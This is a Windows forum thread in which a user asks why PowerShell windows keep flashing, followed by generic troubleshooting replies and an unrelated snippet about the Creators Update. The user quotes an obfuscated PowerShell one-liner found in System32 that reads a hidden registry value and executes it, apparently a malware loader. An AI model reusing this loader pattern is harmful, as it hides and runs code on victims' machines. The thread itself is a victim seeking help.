Windows 10: Powershell windows popping up every day, just for a second.

So I've been having this issue for a few weeks now and I'm not quite sure what's going on.I get about 5-6 PowerShell windows popping up together for a split second, about 1-2 times a day, and then they're gone again.In Event viewer, they're of this form:All of them at 18:25:42 are in the System32 folder and the files called things like 871E.tmp.ps1, only contain line of code like this:$yZNfZfBNAR=[ScriptBlock]; icm $yZNfZfBNAR::Create[string]::Join'',gp [regex]::Matches'zrmWcOxD\ERAWTFOS\:MLKH','.','RightToLeft' ForEach {$_.value} -join ''.'xbYOKG0h' % { [char]$_ }

Scheduled tasks that use Powershell can cause the Powershell window to appear periodically on your computer. We suggest that you check the Task Scheduler.

• Click on Start.
• In the search bar, type Task Scheduler and click on
  Task Scheduler in the results.
• Under Active Tasks, check for any tasks that use Powershell and the scheduled time.

Malware can also cause this issue. We suggest that you use Windows Defender or a third-party security software to scan your system.

Thank you for the update. Just to confirm, is Windows PowerShell shows up when turning on your device? If so, this could be due to creating a shortcut on startup folder. To know the list of items that runs when Windows started, we suggest that you check
it in Task Manager > Startup. Check if Windows PowerShell is listed and enabled.

We would appreciate if you will send us a screenshot showing the startup tab on your Task manager to better assist you.

PowerShell instead of Commandline in Creators Update

Interestingly enough my personal laptop just got the update...and still has Command Prompt listed, not PowerShell...

Edit: Not that it matters...I use both regularly. *Toast :toast:
